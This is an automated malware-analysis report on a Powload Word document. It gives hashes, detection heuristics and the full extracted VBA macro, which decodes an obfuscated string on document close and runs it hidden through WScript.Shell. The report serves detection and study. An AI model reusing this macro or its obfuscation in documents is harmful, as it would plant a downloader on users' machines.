Powload — Office (OOXML) malware analysis

Static analysis result for SHA-256 c273a69f39e66cf6…

MALICIOUS

Office (OOXML)

Size: 53.2 KB
Created: 2017-11-29 23:43:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2019-01-20
MD5: 231d4f2c7eb9b8af7915e3ca4d4c1d2b
SHA-1: 55e714a36a7922274733ffaf8ddbb9ff77787c22
SHA-256: c273a69f39e66cf687f1d9089e7c21191f265c34c0dded99cefea57df8509c24
Risk score: 290

Malware Insights

Powload · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is an OOXML document containing VBA macros. An AutoClose macro is present; it decodes an obfuscated string through a character-lookup routine and passes the result via Application.Run to a private sub that executes it with WScript.Shell.Run in a hidden window. The ClamAV detection 'Doc.Downloader.Powload-6707242-0' strongly suggests the Powload family, which is known for downloading and executing second-stage payloads, so the decoded command is most likely a downloader for a further payload.

Heuristics (7)

  • ClamAV: Doc.Downloader.Powload-6707242-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6707242-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
         If lampshell - dubby > 1 Then
           CreateObject("WScript.Shell").Run herbicolous, 0
           tetrodotoxin = False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
         If lampshell - dubby > 1 Then
           CreateObject("WScript.Shell").Run herbicolous, 0
           tetrodotoxin = False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
      guardianships = Array("R", "r", "e", "", "D", "n", "0", "U", "0", "4", "e", "", "", "b", "p", "A", "A", "Q", "Z", "m", "R", "D", "r", "X", "0", "", "Z", "s", "W", "X", "D", "r", "", "m", "i", "e", "N", "X", "0", "n", "i", "Z", "R", "A", "G", "f", "c", "A", "", "0", "m", "U", "n", "b", "e", "b", "S", "O", "", "R", "D", "g", "", "m", "O", "R", "q")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape  In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1
Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2113 bytes
SHA-256: 2d391a0c45f31b8270c7027aca5f1583869f986a725dc2bbe0c945d7729f4ee1
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function firestorms(guardianships)
  phacidiaceae = Array("R", "4", "", "A", "Z", "c", "p", "g", "n", "i", "D", "U", "q", "G", "S", "O", "X", "b", "r", "W", "s", "Q", "N", "f", "m", "e", "0")
  alphorn = Array("m", " ", "t", "/", "o", "O", ":", "=", ".", "c", "a", "x", "g", "I", "?", "u", "n", "p", "s", "v", "y", "f", "i", "S", "r", "h", "e")
  
  meningoencephalitis = vbNullString
  
  For Each activable In guardianships
    overcreed = wily(activable, phacidiaceae, UBound(phacidiaceae))
    If overcreed > -1 Then
    meningoencephalitis = alphorn(overcreed) & meningoencephalitis
    End If
  Next
  
  firestorms = StrReverse(meningoencephalitis)
  
End Function

Public Function wily(yardkeep, duchy, anemically)
  offsaddle = 3
  areas = 1992
  For offsaddle = 0 To anemically
    If duchy(offsaddle) = yardkeep Then
     areas = offsaddle
    End If
  Next

  If areas = 1992 Then
    areas = -1
  End If
  
  wily = areas
End Function

Sub AutoClose()
  guardianships = Array("R", "r", "e", "", "D", "n", "0", "U", "0", "4", "e", "", "", "b", "p", "A", "A", "Q", "Z", "m", "R", "D", "r", "X", "0", "", "Z", "s", "W", "X", "D", "r", "", "m", "i", "e", "N", "X", "0", "n", "i", "Z", "R", "A", "G", "f", "c", "A", "", "0", "m", "U", "n", "b", "e", "b", "S", "O", "", "R", "D", "g", "", "m", "O", "R", "q")
  anthropomorphological = firestorms(guardianships)
  
  Application.Run "classification", anthropomorphological
  
End Sub


Private Sub classification(herbicolous)
   
   dubby = DateDiff("s", #1/1/1970#, Now())
   tetrodotoxin = True
   
   While tetrodotoxin
     lampshell = dubby + 60
     If lampshell - dubby > 1 Then
       CreateObject("WScript.Shell").Run herbicolous, 0
       tetrodotoxin = False
      End If
     
   Wend

End Sub
Artifact 2
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 11776 bytes
SHA-256: 2628e71d3f81e363f481851dc2efe9cb60c4e1b606a0f6b48b3cddefc77d0f0c
Detection: ClamAV: Doc.Downloader.Powload-6707242-0
Obfuscation or payload: unlikely